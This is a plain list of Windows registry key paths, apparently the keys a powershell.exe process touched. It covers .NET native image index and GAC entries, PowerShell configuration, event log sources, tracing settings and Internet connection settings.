HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\2b1373f4\4f4f14cc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-120665959-548228820-2376508522-1001\Installer\Assemblies\C:|Windows|system32|windowspowershell|v1.0|powershell.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|system32|windowspowershell|v1.0|powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|system32|windowspowershell|v1.0|powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-120665959-548228820-2376508522-1001\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CseOn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TailCallOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeInline
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeCalliOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NewGCCalc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TURNOFFDEBUGINFO
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableHotCold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\internal\jit\Perf
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3e571dbb\41bddfc6
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\Environment\PSMODULEPATH
HKEY_CURRENT_USER\Environment
HKEY_CURRENT_USER\Environment\PSMODULEPATH
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\path
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\StackVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\a94d4ab\5a294d6
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\HardwareEvents
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Internet Explorer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Key Management Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Media Center
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Media Center\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\OAlerts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Security\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Windows PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Windows PowerShell\PowerShell
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\20fe3c1a\56aa3966
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\BidInterface\Loader
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\PipelineMaxStackSizeMB
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\MUI\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop\PreferredUILanguages
HKEY_CURRENT_USER\Control Panel\Desktop\LanguageConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MissingDependencies
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\powershell_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
